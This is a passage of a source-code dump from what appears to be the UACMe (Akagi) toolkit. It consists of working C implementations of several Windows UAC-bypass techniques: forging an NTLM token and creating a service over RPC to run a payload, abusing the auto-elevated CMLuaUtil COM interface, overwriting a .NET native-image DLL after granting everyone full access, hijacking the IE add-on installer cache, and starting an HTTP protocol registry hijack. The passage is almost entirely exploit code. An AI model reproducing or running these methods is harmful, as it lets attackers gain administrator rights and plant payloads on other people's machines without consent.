RpcConnection->dwProcedureInputDataLength += dwDataLength;\n    RpcConnection->dwProcedureInputDataLength += dwPadding;\n\n    return TRUE;\n}\n\nBOOL ucmxRpcAppendRequestData_Dword(\n    _In_ PRPC_CONNECTION pRpcConnection,\n    _In_ DWORD dwValue)\n{\n    return ucmxRpcAppendRequestData_Binary(\n        pRpcConnection,\n        (BYTE*)&dwValue,\n        sizeof(DWORD),\n        FALSE);\n}\n\nBOOL ucmxInvokeCreateSvcRpcMain(\n    _In_ LPWSTR lpszPayload)\n{\n    BOOL bResult = FALSE;\n    RPC_CONNECTION RpcConnection;\n    BYTE bServiceManagerObject[20];\n    BYTE bServiceObject[20];\n    DWORD dwReturnValue = 0;\n    DWORD dwServiceNameLength = 0;\n    WCHAR szServiceName[32];\n    DWORD 
dwServiceCommandLineLength = 0;\n\n    RpcConnection.hFile = INVALID_HANDLE_VALUE;\n\n    do {\n\n        //\n        // Generate random name for service.\n        //\n        szServiceName[0] = 0;\n        supBinTextEncode(supGetTickCount64(), szServiceName);\n\n        dwServiceNameLength = (DWORD)(_strlen(szServiceName) + 1);\n        dwServiceCommandLineLength = (DWORD)(_strlen(lpszPayload) + 1);\n\n        if (!ucmxRpcConnect(TEXT(\"ntsvcs\"), SVCCTL_UUID, 2, &RpcConnection))\n            break;\n\n        //\n        // OpenSCManager.\n        //\n        ucmxRpcInitializeRequestData(&RpcConnection);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, SC_MANAGER_ALL_ACCESS);\n\n        if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_OPEN_SC_MANAGERW))\n            break;\n\n        if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER)\n            break;\n\n        dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[20];\n        if (dwReturnValue != 0)\n            break;\n\n        RtlCopyMemory(bServiceManagerObject, &RpcConnection.bProcedureOutputData[0], sizeof(bServiceManagerObject));\n\n        //\n        // CreateService RPC request.\n        //\n        ucmxRpcInitializeRequestData(&RpcConnection);\n        ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceManagerObject, sizeof(bServiceManagerObject), FALSE);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength);\n        ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)szServiceName, dwServiceNameLength, TRUE);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ALL_ACCESS);\n        
ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_WIN32_OWN_PROCESS);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_DEMAND_START);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ERROR_IGNORE);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength);\n        ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)lpszPayload, dwServiceCommandLineLength, TRUE);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n\n        if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_CREATE_SERVICEW))\n            break;\n\n        if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_CREATE_SERVICE)\n            break;\n\n        dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[24];\n        if (dwReturnValue != 0)\n            break;\n\n        RtlCopyMemory(bServiceObject, &RpcConnection.bProcedureOutputData[4], sizeof(bServiceObject));\n\n        //\n        // StartService RPC request.\n        //\n        ucmxRpcInitializeRequestData(&RpcConnection);\n        ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n        ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n\n        if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_START_SERVICEW))\n            break;\n\n        if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_START_SERVICE)\n            
break;\n\n        dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0];\n        if (dwReturnValue != 0 && dwReturnValue != ERROR_SERVICE_REQUEST_TIMEOUT)\n            break;\n\n        //\n        // DeleteService RPC request.\n        //\n        ucmxRpcInitializeRequestData(&RpcConnection);\n        ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE);\n\n        if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_DELETE_SERVICE))\n            break;\n\n        if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_DELETE_SERVICE)\n            break;\n\n        dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0];\n        if (dwReturnValue != 0)\n            break;\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (RpcConnection.hFile != INVALID_HANDLE_VALUE)\n        CloseHandle(RpcConnection.hFile);\n\n    return bResult;\n}\n\nSECURITY_STATUS ucmxForgeNetworkAuthToken(\n    _Out_ PHANDLE TokenHandle\n) {\n\n    CredHandle hCredClient, hCredServer;\n    TimeStamp lifetimeClient, lifetimeServer;\n    SecBufferDesc negotiateDesc, challengeDesc, authenticateDesc;\n    SecBuffer negotiateBuffer, challengeBuffer, authenticateBuffer;\n    CtxtHandle clientContextHandle, serverContextHandle;\n    ULONG clientContextAttributes, serverContextAttributes;\n    SECURITY_STATUS secStatus;\n    HANDLE hTokenNetwork = NULL;\n\n    *TokenHandle = NULL;\n    serverContextHandle.dwLower = 0;\n    serverContextHandle.dwUpper = 0;\n    clientContextHandle.dwLower = 0;\n    clientContextHandle.dwUpper = 0;\n    hCredServer.dwLower = 0;\n    hCredServer.dwUpper = 0;\n\n    RtlSecureZeroMemory(&negotiateBuffer, sizeof(negotiateBuffer));\n    RtlSecureZeroMemory(&challengeBuffer, sizeof(challengeBuffer));\n    RtlSecureZeroMemory(&authenticateBuffer, sizeof(authenticateBuffer));\n\n    do {\n\n        secStatus = AcquireCredentialsHandle(NULL,\n            (LPWSTR)NTLMSP_NAME,\n            
SECPKG_CRED_OUTBOUND,\n            NULL,\n            NULL,\n            NULL,\n            NULL,\n            &hCredClient,\n            &lifetimeClient);\n\n        if (!NT_SUCCESS(secStatus))\n            break;\n\n        secStatus = AcquireCredentialsHandle(NULL,\n            (LPWSTR)NTLMSP_NAME,\n            SECPKG_CRED_INBOUND,\n            NULL,\n            NULL,\n            NULL,\n            NULL,\n            &hCredServer,\n            &lifetimeServer);\n\n        if (!NT_SUCCESS(secStatus))\n            break;\n\n        negotiateDesc.ulVersion = 0;\n        negotiateDesc.cBuffers = 1;\n        negotiateDesc.pBuffers = &negotiateBuffer;\n        negotiateBuffer.cbBuffer = MAX_MESSAGE_SIZE;\n        negotiateBuffer.BufferType = SECBUFFER_TOKEN;\n        negotiateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);\n        if (negotiateBuffer.pvBuffer == NULL) {\n            secStatus = SEC_E_INSUFFICIENT_MEMORY;\n            break;\n        }\n\n        secStatus = InitializeSecurityContext(&hCredClient,\n            NULL,\n            NULL,\n            ISC_REQ_DATAGRAM,\n            0,\n            SECURITY_NATIVE_DREP,\n            NULL,\n            0,\n            &clientContextHandle,\n            &negotiateDesc,\n            &clientContextAttributes,\n            &lifetimeClient);\n\n        if (!NT_SUCCESS(secStatus))\n            break;\n\n        challengeDesc.ulVersion = 0;\n        challengeDesc.cBuffers = 1;\n        challengeDesc.pBuffers = &challengeBuffer;\n        challengeBuffer.cbBuffer = MAX_MESSAGE_SIZE;\n        challengeBuffer.BufferType = SECBUFFER_TOKEN;\n        challengeBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);\n        if (challengeBuffer.pvBuffer == NULL) {\n            secStatus = SEC_E_INSUFFICIENT_MEMORY;\n            break;\n        }\n\n        secStatus = AcceptSecurityContext(&hCredServer,\n            NULL,\n            &negotiateDesc,\n            ASC_REQ_DATAGRAM,\n            SECURITY_NATIVE_DREP,\n         
   &serverContextHandle,\n            &challengeDesc,\n            &serverContextAttributes,\n            &lifetimeServer);\n\n        if (!NT_SUCCESS(secStatus))\n            break;\n\n        authenticateDesc.ulVersion = 0;\n        authenticateDesc.cBuffers = 1;\n        authenticateDesc.pBuffers = &authenticateBuffer;\n        authenticateBuffer.cbBuffer = MAX_MESSAGE_SIZE;\n        authenticateBuffer.BufferType = SECBUFFER_TOKEN;\n        authenticateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE);\n        if (authenticateBuffer.pvBuffer == NULL) {\n            secStatus = SEC_E_INSUFFICIENT_MEMORY;\n            break;\n        }\n\n        secStatus = InitializeSecurityContext(NULL,\n            &clientContextHandle,\n            NULL,\n            0,\n            0,\n            SECURITY_NATIVE_DREP,\n            &challengeDesc,\n            0,\n            &clientContextHandle,\n            &authenticateDesc,\n            &clientContextAttributes,\n            &lifetimeClient);\n\n        if (!NT_SUCCESS(secStatus))\n            break;\n\n        secStatus = AcceptSecurityContext(NULL,\n            &serverContextHandle,\n            &authenticateDesc,\n            0,\n            SECURITY_NATIVE_DREP,\n            &serverContextHandle,\n            NULL,\n            &serverContextAttributes,\n            &lifetimeServer);\n\n        if (!NT_SUCCESS(secStatus))\n            break;\n\n        secStatus = QuerySecurityContextToken(&serverContextHandle, &hTokenNetwork);\n\n    } while (FALSE);\n\n    if (negotiateBuffer.pvBuffer)\n        supHeapFree(negotiateBuffer.pvBuffer);\n    if (challengeBuffer.pvBuffer)\n        supHeapFree(challengeBuffer.pvBuffer);\n    if (authenticateBuffer.pvBuffer)\n        supHeapFree(authenticateBuffer.pvBuffer);\n\n    FreeCredentialsHandle(&hCredClient);\n    FreeCredentialsHandle(&hCredServer);\n\n    DeleteSecurityContext(&clientContextHandle);\n    DeleteSecurityContext(&serverContextHandle);\n\n    *TokenHandle = 
hTokenNetwork;\n    return secStatus;\n}\n\n/*\n* ucmSspiDatagramMethod\n*\n* Purpose:\n*\n* Bypass UAC using SSPI datagram context.\n* \n* Fixed by MS ninja patch (including old Win10 releases).\n*\n*/\nNTSTATUS ucmSspiDatagramMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    BOOL bNeedCleanup = FALSE, bImpersonate = FALSE;\n    SECURITY_IMPERSONATION_LEVEL impLevel;\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HANDLE hToken = NULL;\n    WCHAR szLoaderFileName[MAX_PATH * 2];\n\n    //\n    // Forge token for impersonation.\n    //\n    MethodResult = ucmxForgeNetworkAuthToken(&hToken);\n    if (!NT_SUCCESS(MethodResult))\n        return MethodResult;\n\n    do {\n\n        MethodResult = STATUS_ACCESS_DENIED;\n\n        //\n        // Write loader to the %temp%\n        //\n        if (!supReplaceDllEntryPoint(\n            ProxyDll,\n            ProxyDllSize,\n            AKATSUKI_ENTRYPOINT_EXE,\n            TRUE))\n        {\n            break;\n        }\n\n        RtlSecureZeroMemory(&szLoaderFileName, sizeof(szLoaderFileName));\n        _strcpy(szLoaderFileName, g_ctx->szTempDirectory);\n        _strcat(szLoaderFileName, THEOLDNEWTHING);\n        _strcat(szLoaderFileName, TEXT(\".exe\"));\n\n        bNeedCleanup = supWriteBufferToFile(szLoaderFileName, ProxyDll, ProxyDllSize);\n        if (!bNeedCleanup)\n            break;\n\n        bImpersonate = ImpersonateLoggedOnUser(hToken);\n        if (!bImpersonate)\n            break;\n\n        if (!supGetThreadTokenImpersonationLevel(NtCurrentThread(), &impLevel))\n            break;\n\n        if (impLevel < SecurityImpersonation)\n            break;\n\n        if (ucmxInvokeCreateSvcRpcMain(szLoaderFileName))\n            MethodResult = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    if (bImpersonate)\n        RevertToSelf();\n\n    if (hToken)\n        CloseHandle(hToken);\n\n    if (bNeedCleanup)\n        DeleteFile(szLoaderFileName);\n\n    return MethodResult;\n}\n"
  },
  {
    "path": "Source/Akagi/methods/api0cradle.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2022\n*\n*  TITLE:       API0CRADLE.C\n*\n*  VERSION:     3.61\n*\n*  DATE:        22 Jun 2022\n*\n*  UAC bypass method from Oddvar Moe aka api0cradle.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmCMLuaUtilShellExecMethod\n*\n* Purpose:\n*\n* Bypass UAC using AutoElevated undocumented CMLuaUtil interface.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nNTSTATUS ucmCMLuaUtilShellExecMethod(\n    _In_ LPWSTR lpszExecutable\n)\n{\n    NTSTATUS    MethodResult = STATUS_ACCESS_DENIED;\n    HRESULT     r, hr_init;\n    ICMLuaUtil* CMLuaUtil = NULL;\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        r = ucmAllocateElevatedObject(\n            T_CLSID_CMSTPLUA,\n            &IID_ICMLuaUtil,\n            CLSCTX_LOCAL_SERVER,\n            (void**)&CMLuaUtil);\n\n        if (r != S_OK)\n            break;\n\n        if (CMLuaUtil == NULL)\n            break;\n\n        r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil,\n            lpszExecutable,\n            NULL,\n            NULL,\n            SEE_MASK_DEFAULT,\n            SW_SHOW);\n\n        if (SUCCEEDED(r))\n            MethodResult = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    if (CMLuaUtil != NULL) {\n        CMLuaUtil->lpVtbl->Release(CMLuaUtil);\n    }\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    return MethodResult;\n}\n"
  },
  {
    "path": "Source/Akagi/methods/azagarampur.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2020 - 2025\n*\n*  TITLE:       AZAGARAMPUR.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  UAC bypass methods from AzAgarampur.\n*\n*  For description please visit original URL\n*\n*  https://github.com/AzAgarampur/byeintegrity-uac\n*  https://github.com/AzAgarampur/byeintegrity2-uac\n*  https://github.com/AzAgarampur/byeintegrity3-uac\n*  https://github.com/AzAgarampur/byeintegrity4-uac\n*  https://github.com/AzAgarampur/byeintegrity-lite\n*  https://github.com/AzAgarampur/byeintegrity7-uac\n*  https://github.com/AzAgarampur/byeintegrity8-uac\n*  https://github.com/AzAgarampur/byeintegrity9-uac\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\n#ifdef _WIN64\n#include \"pcasvc/w7/x64/pcasvc7_64.h\"\n#include \"pcasvc/w8_10/x64/pcasvc64.h\"\n#else\n#include \"pcasvc/w7/x86-32/pcasvc7_32.h\"\n#include \"pcasvc/w8_10/x86-32/pcasvc32.h\"\n#endif\n\n/*\n* ucmxNgenLogLastWrite\n*\n* Purpose:\n*\n* Query ngen.log last write time.\n*\n*/\nBOOL ucmxNgenLogLastWrite(\n    _Out_ FILETIME* LastWriteTime\n)\n{\n    BOOL bResult = FALSE;\n    HANDLE hFile;\n    WCHAR szFileName[MAX_PATH * 2];\n\n    LastWriteTime->dwLowDateTime = 0;\n    LastWriteTime->dwHighDateTime = 0;\n\n    _strcpy(szFileName, g_ctx->szSystemRoot);\n    _strcat(szFileName, MSNETFRAMEWORK_DIR);\n\n#ifdef _WIN64\n    _strcat(szFileName, TEXT(\"64\"));\n#endif\n\n    _strcat(szFileName, TEXT(\"\\\\\"));\n    _strcat(szFileName, NET4_DIR);\n    _strcat(szFileName, TEXT(\"\\\\\"));\n    _strcat(szFileName, TEXT(\"ngen.log\"));\n\n    hFile = CreateFile(szFileName,\n        
GENERIC_READ,\n        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n        NULL,\n        OPEN_EXISTING,\n        0,\n        NULL);\n    if (hFile != INVALID_HANDLE_VALUE) {\n        bResult = GetFileTime(hFile, NULL, NULL, LastWriteTime);\n        CloseHandle(hFile);\n    }\n\n    return bResult;\n}\n\n/*\n* ucmNICPoisonMethod\n*\n* Purpose:\n*\n* Bypass UAC by Dll hijack of Native Image Cache.\n*\n*/\nNTSTATUS ucmNICPoisonMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    WCHAR szFileName[MAX_PATH * 2];\n    WCHAR szTargetProc[MAX_PATH * 2];\n    DWORD origSize = 0, bytesIO;\n    PBYTE origFileBuffer = NULL;\n\n    HANDLE hFile;\n\n    LPWSTR oldSecurity = NULL;\n    LPWSTR lpAssemblyFilePath = NULL, lpTargetFileName = NULL;\n\n    BOOLEAN IsWin7, bSecurityReset = FALSE;\n\n    FILETIME lastWriteTime, checkTime;\n\n    INT iRetryCount = 50;\n\n    GUID targetMVID;\n    FUSION_SCAN_PARAM scanParam;\n\n    do {\n\n        IsWin7 = (g_ctx->dwBuildNumber < NT_WIN8_RTM);\n\n        if (!fusUtilInitFusion(IsWin7 ? 
2 : 4))\n            break;\n\n        if (!fusUtilGetAssemblyPathByName(ASSEMBLY_ACCESSIBILITY, &lpAssemblyFilePath))\n            break;\n\n        if (!fusUtilGetImageMVID(lpAssemblyFilePath, &targetMVID))\n            break;\n\n        if (!IsWin7) {\n\n            ucmxNgenLogLastWrite(&lastWriteTime);\n\n            //\n            // Run NET maintenance tasks.\n            //\n            _strcpy(szFileName, g_ctx->szSystemDirectory);\n            _strcat(szFileName, MSCHEDEXE_EXE);\n\n            if (!supRunProcess2(szFileName,\n                TEXT(\"Start\"),\n                NULL,\n                SW_HIDE,\n                SUPRUNPROCESS_TIMEOUT_DEFAULT))\n            {\n                break;\n            }\n\n            //\n            // Wait for task completion.\n            //\n\n            do {\n\n                Sleep(2000);\n\n                if (FALSE == supIsProcessRunning(TEXT(\"ngentask.exe\"))) {\n\n                    if (ucmxNgenLogLastWrite(&checkTime)) {\n\n                        if (CompareFileTime(&lastWriteTime, &checkTime) < 0) {\n                            break;\n                        }\n                    }\n\n                }\n\n                --iRetryCount;\n\n            } while (iRetryCount);\n\n        }\n\n        //\n        // Locate target NI file.\n        //\n        scanParam.ReferenceMVID = &targetMVID;\n        scanParam.lpFileName = NULL;\n\n        _strcpy(szFileName, g_ctx->szSystemRoot);\n        _strcat(szFileName, TEXT(\"assembly\\\\NativeImages_\"));\n        if (IsWin7)\n            _strcat(szFileName, NET2_DIR);\n        else\n            _strcat(szFileName, NET4_DIR);\n\n#ifdef _WIN64\n        _strcat(szFileName, TEXT(\"_64\"));\n#else\n        _strcat(szFileName, TEXT(\"_32\"));\n#endif\n        _strcat(szFileName, TEXT(\"\\\\Accessibility\\\\\"));\n\n        if (!fusUtilScanDirectory(szFileName,\n            TEXT(\"*.dll\"),\n            (pfnFusionScanFilesCallback)fusUtilFindFileByMVIDCallback,\n  
          &scanParam))\n        {\n            break;\n        }\n\n        lpTargetFileName = scanParam.lpFileName;\n        if (lpTargetFileName == NULL)\n            break;\n\n        //\n        // Read existing file to memory.\n        //\n        origFileBuffer = supReadFileToBuffer(lpTargetFileName, &origSize);\n        if (origFileBuffer == NULL)\n            break;\n\n        //\n        // Remember old file security permissions.\n        //\n        oldSecurity = NULL;\n        if (!ucmMasqueradedGetObjectSecurityCOM(lpTargetFileName,\n            DACL_SECURITY_INFORMATION,\n            SE_FILE_OBJECT,\n            &oldSecurity))\n        {\n            break;\n        }\n\n        //\n        // Reset target file permissions.\n        //\n        if (!ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,\n            DACL_SECURITY_INFORMATION,\n            SE_FILE_OBJECT,\n            T_SDDL_ALL_FOR_EVERYONE))\n        {\n            break;\n        }\n\n        bSecurityReset = TRUE;\n\n        //\n        // Overwrite file with Fubuki.\n        //\n        hFile = CreateFile(lpTargetFileName,\n            GENERIC_WRITE,\n            0,\n            NULL,\n            OPEN_EXISTING,\n            0,\n            NULL);\n\n        if (hFile != INVALID_HANDLE_VALUE) {\n            WriteFile(hFile, ProxyDll, ProxyDllSize, &bytesIO, NULL);\n            SetEndOfFile(hFile);\n            CloseHandle(hFile);\n        }\n        else\n            break;\n\n        //\n        // Run target.\n        //\n        _strcpy(szTargetProc, g_ctx->szSystemDirectory);\n        _strcat(szTargetProc, MMC_EXE);\n\n        if (supRunProcess2(szTargetProc,\n            WF_MSC,\n            NULL,\n            SW_SHOW,\n            SUPRUNPROCESS_TIMEOUT_DEFAULT))\n        {\n            MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    if (lpAssemblyFilePath)\n        supHeapFree(lpAssemblyFilePath);\n\n    //\n    // Restore original file contents and 
permissions.\n    //\n    if (origFileBuffer) {\n        if (lpTargetFileName) {\n            hFile = CreateFile(lpTargetFileName,\n                GENERIC_WRITE,\n                0,\n                NULL,\n                OPEN_EXISTING,\n                0,\n                NULL);\n\n            if (hFile != INVALID_HANDLE_VALUE) {\n                WriteFile(hFile, origFileBuffer, origSize, &bytesIO, NULL);\n                SetEndOfFile(hFile);\n                CloseHandle(hFile);\n            }\n        }\n\n        supVirtualFree(origFileBuffer, NULL);\n    }\n\n    if (oldSecurity) {\n        if (bSecurityReset && lpTargetFileName) {\n            ucmMasqueradedSetObjectSecurityCOM(lpTargetFileName,\n                DACL_SECURITY_INFORMATION,\n                SE_FILE_OBJECT,\n                oldSecurity);\n        }\n        CoTaskMemFree(oldSecurity);\n    }\n\n    if (lpTargetFileName) {\n        supHeapFree(lpTargetFileName);\n    }\n\n    if (!NT_SUCCESS(MethodResult))\n        supSetGlobalCompletionEvent();\n\n    return MethodResult;\n}\n\n/*\n* ucmIeAddOnInstallMethod\n*\n* Purpose:\n*\n* Bypass UAC by IE Admin Add-On Installer COM object.\n*\n*/\nNTSTATUS ucmIeAddOnInstallMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HRESULT  r = E_FAIL, hr_init;\n\n    IIEAdminBrokerObject* BrokerObject = NULL;\n    IActiveXInstallBroker* InstallBroker = NULL;\n\n    BSTR adminInstallerUuid = NULL;\n    BSTR cacheItemFilePath = NULL, fileToVerify = NULL;\n\n    ULONG dummy = 0;\n    PUCHAR dummyPtr = NULL;\n\n    PWCHAR lpPayloadFile = NULL, lpTargetDir = NULL, lpFileName = NULL, lpDirectory = NULL;\n    SIZE_T cchBuffer;\n\n    HANDLE processHandle = NULL;\n\n    BSTR workdirBstr, emptyBstr;\n\n    WCHAR szDummyTarget[MAX_PATH * 2];\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        if (!supReplaceDllEntryPoint(\n            ProxyDll,\n            
ProxyDllSize,\n            FUBUKI_DEFAULT_ENTRYPOINT,\n            TRUE))\n        {\n            break;\n        }\n\n        //\n        // VerifyFile required.\n        //\n        HRESULT_BREAK_ON_FAILED(\n            CoInitializeSecurity(NULL,\n                -1,\n                NULL,\n                NULL,\n                RPC_C_AUTHN_LEVEL_CONNECT,\n                RPC_C_IMP_LEVEL_IMPERSONATE,\n                NULL,\n                0,\n                NULL));\n\n        //\n        // Allocate elevated factory object.\n        //\n        HRESULT_BREAK_ON_FAILED(\n            ucmAllocateElevatedObject(T_CLSID_IEAAddonInstaller,\n                &IID_IEAxiAdminInstaller,\n                CLSCTX_LOCAL_SERVER,\n                &BrokerObject));\n\n        HRESULT_BREAK_ON_FAILED(\n            BrokerObject->lpVtbl->InitializeAdminInstaller(BrokerObject,\n                NULL,\n                0,\n                &adminInstallerUuid));\n\n        //\n        // Query install broker object.\n        //\n        HRESULT_BREAK_ON_FAILED(\n            BrokerObject->lpVtbl->QueryInterface(BrokerObject,\n                &IID_IEAxiInstaller2,\n                &InstallBroker));\n\n        _strcpy(szDummyTarget, g_ctx->szSystemDirectory);\n        _strcat(szDummyTarget, CONSENT_EXE);\n\n        //\n        // Verify image embedded signature.\n        // Upon success copy given file to the temporary directory and return full filepath.\n        //\n        fileToVerify = SysAllocString(szDummyTarget);\n        if (fileToVerify) {\n\n            r = InstallBroker->lpVtbl->VerifyFile(InstallBroker,\n                adminInstallerUuid,\n                (HWND)INVALID_HANDLE_VALUE,\n                fileToVerify,\n                fileToVerify,\n                NULL,\n                WTD_UI_NONE,\n                WTD_UICONTEXT_EXECUTE,\n                &IID_IUnknown,\n                &cacheItemFilePath,\n                &dummy,\n                &dummyPtr);\n\n            
CoTaskMemFree(dummyPtr);\n            SysFreeString(fileToVerify);\n        }\n\n        HRESULT_BREAK_ON_FAILED(r);\n\n        //\n        // Kill file in cache\n        //\n        if (!ucmMasqueradedDeleteDirectoryFileCOM(cacheItemFilePath))\n            break;\n\n        //\n        // Replace file in cache with Fubuki.\n        //\n        cchBuffer = (SIZE_T)SysStringLen(cacheItemFilePath);\n        lpPayloadFile = (PWCHAR)supHeapAlloc(cchBuffer * 2);\n        if (lpPayloadFile == NULL)\n            break;\n\n        lpTargetDir = (PWCHAR)supHeapAlloc(cchBuffer * 2);\n        if (lpTargetDir == NULL)\n            break;\n\n        lpFileName = _filename(cacheItemFilePath);\n        if (lpFileName == NULL)\n            break;\n\n        _strcpy(lpPayloadFile, g_ctx->szTempDirectory);\n        _strcat(lpPayloadFile, lpFileName);\n\n        if (!supWriteBufferToFile(lpPayloadFile, ProxyDll, ProxyDllSize))\n            break;\n\n        lpDirectory = _filepath(cacheItemFilePath, lpTargetDir);\n        if (lpDirectory == NULL)\n            break;\n\n        if (!ucmMasqueradedMoveCopyFileCOM(lpPayloadFile, lpDirectory, TRUE))\n            break;\n\n        //\n        // Run file from cache.\n        //\n        workdirBstr = SysAllocString(g_ctx->szTempDirectory);\n        if (workdirBstr) {\n\n            emptyBstr = SysAllocString(TEXT(\"\"));\n            if (emptyBstr) {\n\n                r = InstallBroker->lpVtbl->RunSetupCommand(InstallBroker,\n                    adminInstallerUuid,\n                    NULL,\n                    cacheItemFilePath,\n                    emptyBstr,\n                    workdirBstr,\n                    emptyBstr,\n                    4, //RSC_FLAG_QUIET\n                    &processHandle); //there is always no process handle on output, ignore.\n\n                SysFreeString(emptyBstr);\n            }\n\n            SysFreeString(workdirBstr);\n\n            if (r == E_INVALIDARG)\n                MethodResult = 
STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    //\n    // Post execution cleanup.\n    //\n\n    if (InstallBroker)\n        InstallBroker->lpVtbl->Release(InstallBroker);\n\n    if (BrokerObject)\n        BrokerObject->lpVtbl->Release(BrokerObject);\n\n    if (adminInstallerUuid)\n        SysFreeString(adminInstallerUuid);\n\n    if (NT_SUCCESS(MethodResult) && lpDirectory) {\n        ucmMasqueradedDeleteDirectoryFileCOM(lpDirectory);\n    }\n\n    if (cacheItemFilePath)\n        SysFreeString(cacheItemFilePath);\n\n    if (lpTargetDir)\n        supHeapFree(lpTargetDir);\n\n    if (lpPayloadFile)\n        supHeapFree(lpPayloadFile);\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    return MethodResult;\n}\n\n/*\n* ucmWscActionProtocolMethod\n*\n* Purpose:\n*\n* Bypass UAC by SecurityCenter COM object and HTTP protocol registry hijack.\n*\n*/\nNTSTATUS ucmWscActionProtocolMethod(\n    _In_ LPCWSTR lpszPayload\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HRESULT  r = E_FAIL, hr_init;\n    IWscAdmin* WscAdminObject = NULL;\n\n    LPOLESTR protoGuidString = NULL;\n    USER_ASSOC_PTR SetUserAssoc;\n    GUID guid;\n\n    RtlSecureZeroMemory(&SetUserAssoc, sizeof(USER_ASSOC_PTR));\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        if (CoCreateGuid(&guid) != S_OK)\n            break;\n\n        if (StringFromCLSID(&guid, &protoGuidString) != S_OK)\n            break;\n\n        MethodResult = supFindUserAssocSet(&SetUserAssoc);\n        if (!NT_SUCCESS(MethodResult)) {\n            break;\n        }\n\n        MethodResult = supRegisterShellAssoc(T_PROTO_HTTP,\n            protoGuidString,\n            &SetUserAssoc,\n            